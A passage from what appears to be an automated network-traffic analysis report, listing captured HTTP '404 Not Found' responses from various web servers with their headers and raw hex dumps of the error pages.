74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:55:37 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:57:02 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ro8%2BRdHQnVliNe7E5davoxQTs2cygGkkW9VFtFoOHfMhs8cUYRTOd2FRiLEzR2vOuZFGqLFUprke5iUZuh8pBPwTtJ1JkCtkeZiTDPAal%2FREEjgyvJMsdBNw2BT1GGSyxwzbUJUyWg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff59ee708b262d6-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119019&min_rtt=119019&rtt_var=59509&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:57:04 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WJO2FK9AJGTkAq99G%2Bdjq3Vc6cxrXhB42WFqvbhE%2FKlJ4a8w6zEPZf385%2BNpegU5X6Zhz%2FKLFEvlkcBqWt1L9RF72xBetg%2FLwZFAecHD23i%2BaCY5DCPjOYXo4IUl0pfkGdzzVHw9yg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff59ef79e5810ed-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118653&min_rtt=118653&rtt_var=59326&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=831&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:57:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O4WYtCaLEnUX2VSFNq%2FqIwxr%2FeBLm8p6A2l8ta%2B%2FdYaAUOTCSygldZ%2B52CBVVBLmPxtND1Gd2YpygCyX%2FAHRf5fviTFOnUbf1OWkETVoqvdYbbirkwGf6qH5gaj97YSuHFRCOW5hYw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff59f082da1874f-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118836&min_rtt=118836&rtt_var=59418&sent=2&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=3948&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:57:10 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dCoKElnvZjL8eD3iYDX9OYPTFhsb14hFxTPkx%2BbLOw9KH5IsIzakScLCZd90t2O0akzI26K5JKnnGybcP8WLlCqDSUKk2XIyYIX0m9W2rRXNFHmakYfy9ZCm2C%2BGFl%2B7jfdUZGXihQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff59f18cd10a49b-ORDalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119224&min_rtt=119224&rtt_var=59612&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=539&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 79 73 70 65 65 63 68 73 74 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.buyspeechst.shop Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:57:16 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:57:19 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:57:22 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:57:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tQAztm%2Busp1qpHvsfHfUeQwzc%2BafZQwG06p1eq8mBC4xyYIQJfAJ4ThgRrm%2FdwRG%2FMn5NfemRFQF3LcW7naKbWG1FdOVeJREGAgxB9ofgZmxJabJc1qIVnc%2BHP0JK7I5U2Y8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff5a023581ee269-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119349&min_rtt=119349&rtt_var=59674&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:57:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8%2BVEtQ15KiJojdThOkBwjCnxmg%2FDDUgvIUVzUVGpFxZIW18r61XTVZF0rX%2BoGg3Bh%2F5JM8mfIcn%2FUEGHb6xalBxmM9i8QzT1rOIybO%2F77fIRQjTusn3HMcmFOhRmnA%2FogHEz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff5a033eda6233a-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119336&min_rtt=119336&rtt_var=59668&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:57:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DnnF83MshvNWhunqlYjFBVtSSDHeezi9y%2FfglLtwhYbufnIIrSg9HZsg9z04dXexydWa07AfZxi8WZv2zilxPTF2Xf7ZaaufoPn8PHRc2ql4bQaoR%2FMHY7OjlU11TTd8OrPQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff5a0448a6a10ed-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118564&min_rtt=118564&rtt_var=59282&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=3936&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:58:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kwE%2BxxjkBYKmn%2FLrgRASdSOP2JOWtsaIhHx7j8%2FGqIIdLoEVSqLZ2V46eevsA7lCP8j0G67TTIC9gRTIwQL8TB%2FHQ0CAkZAJWJfRPL0In0yZxGWstAsIG95aubTuckrO6%2BKp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff5a0552864e269-ORDalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119652&min_rtt=119652&rtt_var=59826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=535&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:58:06 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 
73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:58:09 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 